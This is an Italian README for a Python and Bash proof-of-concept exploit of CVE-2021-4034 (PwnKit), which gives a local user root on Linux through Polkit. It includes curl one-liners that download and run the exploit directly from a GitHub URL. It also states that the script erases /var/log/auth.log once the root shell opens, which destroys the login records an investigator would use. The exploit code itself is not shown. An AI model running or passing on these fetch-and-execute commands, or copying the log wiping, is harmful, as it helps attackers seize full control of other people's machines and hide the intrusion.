
Un PoC in python3 e bash per CVE-2021-4034 di Kim Schulz
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
Un PoC in Python3 e uno in BASH per CVE-2021-4034 di Kim Schulz
Questo è un semplice PoC per l'errore di Polkit recentemente scoperto chiamato PwnKit.
L'ho realizzato sia come script bash che python3 - solo per divertimento.
Il problema è molto semplice da sfruttare ma ha conseguenze enormi, poiché concede facilmente accesso root sulla maggior parte delle macchine Linux dove l'attaccante ha accesso utente locale.
Questi script sono a esecuzione singola, quindi basta fare
python3 pkwner.py
oppure
bash pkwner.sh
Puoi anche eseguirlo direttamente da un webserver (es. questo repository GitHub) tramite:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
oppure
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In entrambi i casi dovrebbe apparire qualcosa del genere:
e

Lo script creerà alcuni file e cartelle ma si pulirà da solo quando la shell root viene aperta - pulirà persino /var/log/auth.log (perché no).